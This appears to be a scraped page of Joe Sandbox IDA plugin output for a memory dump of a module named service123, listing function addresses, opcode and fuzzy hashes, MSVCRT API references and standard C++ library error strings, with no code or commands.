Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 4a3f78940e8b8abc6279819a9ce224b22048fb7e6552d86f0e4144c64e29f2b8
Instruction ID: 98f07c5f30f5dd15b7896ad86c1d2de578d545a0e90963260ba418addad2e3e9
Opcode Fuzzy Hash: 4a3f78940e8b8abc6279819a9ce224b22048fb7e6552d86f0e4144c64e29f2b8
Instruction Fuzzy Hash: 5FA28D71A043598FDB10CF69C48479DBBF2BF46324F298668D869AB692D730DC86CF50

Function 6C9F87C0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1122COMMON

Download Yara Rule

Strings

-, xrefs: 6C9F91DE

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: f027836ed3f3fcd1b9aa7a6652f97046dc9b2d255f87d197da7c29490e24a737
Instruction ID: 769d9850adc204b50c75ab45ad37b8be2c36d40a3cf4d0354dfe1f4103a0cc0a
Opcode Fuzzy Hash: f027836ed3f3fcd1b9aa7a6652f97046dc9b2d255f87d197da7c29490e24a737
Instruction Fuzzy Hash: 59A29D71A043598FDB14CF69C48479DBBB2BF46324F298669D865AF692C330DC86CF90

Function 6CA33690 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

basic_string::_S_construct null not valid, xrefs: 6CA33710

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID: basic_string::_S_construct null not valid
API String ID: 0-290684606
Opcode ID: f260a25153ed8e3f36fe2d60256c986ac060a953823cb27e9187649b39411774
Instruction ID: f1d830c7ecfea362097e7d60be8afe1e7400e96d46affdd31466388973c8fcf6
Opcode Fuzzy Hash: f260a25153ed8e3f36fe2d60256c986ac060a953823cb27e9187649b39411774
Instruction Fuzzy Hash: DD019EB160A3609EC300AF5E809565BFFE4AF91228F99996DE4CC87711C339D4898B52

Function 6C9EA970 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C9EA98D

Strings

basic_string: construction from null is not valid, xrefs: 6C9EA9B0

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: b6260585c44fdde9363a7823e60880203a92c19073814fddcc38163c64377095
Instruction ID: 1a023e424fc65501803b0cf26c7c182531f687e8f65d19996ef653d262afb7c0
Opcode Fuzzy Hash: b6260585c44fdde9363a7823e60880203a92c19073814fddcc38163c64377095
Instruction Fuzzy Hash: 37F05EB19157148FCB00EF6CC18185ABBF8BF56218B4348ADE8C49B715D632E989CB92

Function 6C9EA580 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C9EA59D

Strings

basic_string: construction from null is not valid, xrefs: 6C9EA5C0

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: b6260585c44fdde9363a7823e60880203a92c19073814fddcc38163c64377095
Instruction ID: 6fcc76b0e23206d852b1cd4c5e47a542a6431078ce989b6d7f158ee875476183
Opcode Fuzzy Hash: b6260585c44fdde9363a7823e60880203a92c19073814fddcc38163c64377095
Instruction Fuzzy Hash: 7EF054B19157148FCB00EF6CC18185AB7F4BF55314B42486DD4849B715D631E989CB91

Function 6C9EC510 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C9EC570
basic_string::substr, xrefs: 6C9EC568

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 3653396670f175e5852d9216a90f2753f6edcc0f8be6952bd1fab7170fc4d5b7
Instruction ID: ba14d20ac2221ff51e23e86a97268207e2d0a4fe6121b0889957c8c22bc646d9
Opcode Fuzzy Hash: 3653396670f175e5852d9216a90f2753f6edcc0f8be6952bd1fab7170fc4d5b7
Instruction Fuzzy Hash: E0017C716082109BC704DF2DC58056AFBF1AFCA308F5489ADE088D7310D631D84ACB86

Function 6C9E0740 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C9E07A0
basic_string::substr, xrefs: 6C9E0798

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 510975b486378fdb572886d28cc49501bc23729ca8ebfdab4ba741ccdd72f31d
Instruction ID: 332e79b470bb240118268cc01d5809164b8a3ba2c3a45cdb3eacd699eefdbf3b
Opcode Fuzzy Hash: 510975b486378fdb572886d28cc49501bc23729ca8ebfdab4ba741ccdd72f31d
Instruction Fuzzy Hash: B90146B2A1A3009FD704CF29D881A9FFBE1ABC9754F00992DF488D7710C238D8858B82

Function 6CA046E0 Relevance: 2.1, APIs: 1, Instructions: 873COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85b4605b3e3bec0c8de5e32f74aba02ff3a86a1b2b2465b6deb8f4f1e8d802d2
Instruction ID: 3a729a56b9d0e4adb7ed3536fbf0eeec089f2b8e8647e2605d77bcc88a186e5a
Opcode Fuzzy Hash: 85b4605b3e3bec0c8de5e32f74aba02ff3a86a1b2b2465b6deb8f4f1e8d802d2
Instruction Fuzzy Hash: 4A82AF70F042988FDB10CFA9D48478DBBF1BF5A358F198659E865AB795C3309C85CB81

Function 6CA02CCE Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b884140ed77012c7fd926d42ca482fae034709aced4d01539c306d4fb0266ee
Instruction ID: c3e9aec71f452d44daefe96c799ba4f7899fc28c7e90ab8d3ecc65791042239c
Opcode Fuzzy Hash: 9b884140ed77012c7fd926d42ca482fae034709aced4d01539c306d4fb0266ee
Instruction Fuzzy Hash: C372AF70B0A398CFDB11CFA9D484B8DBFF1AF09358F188659D4A5ABB91D3349885CB41

Function 6CA0140E Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f6990ec00ddae4ede04cd084cfa9fb90fcfb68908925d0c99bdaed098c39aee
Instruction ID: eaccba75b0e407f7179c8f96e886abc8838afdc55450f31935e7d241af5141ad
Opcode Fuzzy Hash: 8f6990ec00ddae4ede04cd084cfa9fb90fcfb68908925d0c99bdaed098c39aee
Instruction Fuzzy Hash: 13728B70B082988FCB10CFA9D4847EDBBF1AF0635CF188659E5A5AB791D334E885CB41

Function 6CA02090 Relevance: 2.0, APIs: 1, Instructions: 790COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a9fabe004246047575e96d8e908d3642622853c2db019b751239ed869088921
Instruction ID: 31bd406b31cb244418251d4464588b04413d993a24abc69d14b62fef36a287d2
Opcode Fuzzy Hash: 4a9fabe004246047575e96d8e908d3642622853c2db019b751239ed869088921
Instruction Fuzzy Hash: 8B727C70E093998FDB15CFA8D48878DBBF1BF0A358F188759D4A5AB791C334A885CB41

Function 6CA007D0 Relevance: 2.0, APIs: 1, Instructions: 789COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7f4f8e6ba2a559f95bcf690ba5263c41b99abaa5f8e9a3166f3b294e33a7a8c
Instruction ID: 15cd4d2aec59b3bc3d80f8afd550f19c821900a1d3b19e0ab5b02e02e8fecf84
Opcode Fuzzy Hash: b7f4f8e6ba2a559f95bcf690ba5263c41b99abaa5f8e9a3166f3b294e33a7a8c
Instruction Fuzzy Hash: 06727970E09398CFDB10CFA9D49479DBBF1BF0A358F188659D4A5ABB81C734A885CB41

Function 6C9EF760 Relevance: 2.0, APIs: 1, Instructions: 770stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9EF8B3

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction ID: d1e228bca7a455383cc804165c24c21fe9afa011b8ba6ad62e2a3fc025f51458
Opcode Fuzzy Hash: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction Fuzzy Hash: 57725974A04258CFCB05DFA8D08069DBBF2BF5D318F28865AE865AB761D731EC41CB51

Function 6CA07A20 Relevance: 1.9, APIs: 1, Instructions: 678COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87784e8220f9a89e56275a7ea36a6a05abf25b40151995bf40cc6a270486a794
Instruction ID: 6c0acd27bc34ab36b8e9c599cba42bb3ec53daaeba218b136612df7244d053fa
Opcode Fuzzy Hash: 87784e8220f9a89e56275a7ea36a6a05abf25b40151995bf40cc6a270486a794
Instruction Fuzzy Hash: 5752D170B052489FCB00CF68E4D079DBBB1AF4636CF28865AE865AB792C735D885CB51

Function 6C9F2360 Relevance: 1.6, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff6372ef0a9251d138f0073624f0ea2ae09fccbdc705b561bfa349615f81e9fa
Instruction ID: 934bec97f7f974621b32975e31f7395e77837404d7ac6e5b8fc10bcd7edda7c3
Opcode Fuzzy Hash: ff6372ef0a9251d138f0073624f0ea2ae09fccbdc705b561bfa349615f81e9fa
Instruction Fuzzy Hash: AEE18975E056998FCB01CFA8C48469DBBF2BF49314F288265E865AB791D334EC46CF60

Function 6CA1DC70 Relevance: 1.6, APIs: 1, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddce1dec344faf4ac185e2707990aaa8d0d8670dbd329984dcfd35d468b9a667
Instruction ID: 2191f68fc72d03c4a39400148a628511bfaabd747c866e449ed5de4b23636bf3
Opcode Fuzzy Hash: ddce1dec344faf4ac185e2707990aaa8d0d8670dbd329984dcfd35d468b9a667
Instruction Fuzzy Hash: 99D17E75E092588FCB01CF68C4C06CDBBF1BF49324F188659E865ABB91D335E985CBA0

Function 6CA19B60 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

, xrefs: 6CA19BF8

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 83699df7e6d7e084f833b56c07643f62ae37ad7e43a9462a6b0f07f6c5923ada
Instruction ID: 07f99d474ef81af7a0fc035dcc0e2aaed5dcce677476ef655e8b8415ca9e08d0
Opcode Fuzzy Hash: 83699df7e6d7e084f833b56c07643f62ae37ad7e43a9462a6b0f07f6c5923ada
Instruction Fuzzy Hash: 53214F71A083058FCB08EF79C98459BB7F5AF99208F14D92DE88087706D730D98ECB92

Function 6C9DEB10 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

__gnu_cxx::__concurrence_lock_error, xrefs: 6C9DEB50

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID: __gnu_cxx::__concurrence_lock_error
API String ID: 0-1226115927
Opcode ID: 0ad35760bc627f3ca649d4dd1436ea34af30bbaa2efcc874e97b27d5b2649c48
Instruction ID: 2cead1cf9a08774742b076b8a689374300243332dd3f774fa5c425fc30403d7f
Opcode Fuzzy Hash: 0ad35760bc627f3ca649d4dd1436ea34af30bbaa2efcc874e97b27d5b2649c48
Instruction Fuzzy Hash: 46E048B5E043428F8B4CEF39C58542BB7B1A799200F44D91DE84253745D634E54DCB97

Function 6C9E0260 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

basic_string::at: __n (which is %zu) >= this->size() (which is %zu), xrefs: 6C9E0280

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID: basic_string::at: __n (which is %zu) >= this->size() (which is %zu)
API String ID: 0-3720052664
Opcode ID: 8fc6e5baf56b2ead790b0160214441b331f328d5c56b0bc2925b73d3ebab553c
Instruction ID: 86bc4e448cc59b3d9984131119a800e0ce4cbb309c13f26252bfde4a51a22747
Opcode Fuzzy Hash: 8fc6e5baf56b2ead790b0160214441b331f328d5c56b0bc2925b73d3ebab553c
Instruction Fuzzy Hash: 2EE046B1E096408BCB04DF08C586829F7F1AF8A304F18DA9CE044A7720D231D850CA0B

Function 6CA0DBEE Relevance: .8, Instructions: 838COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
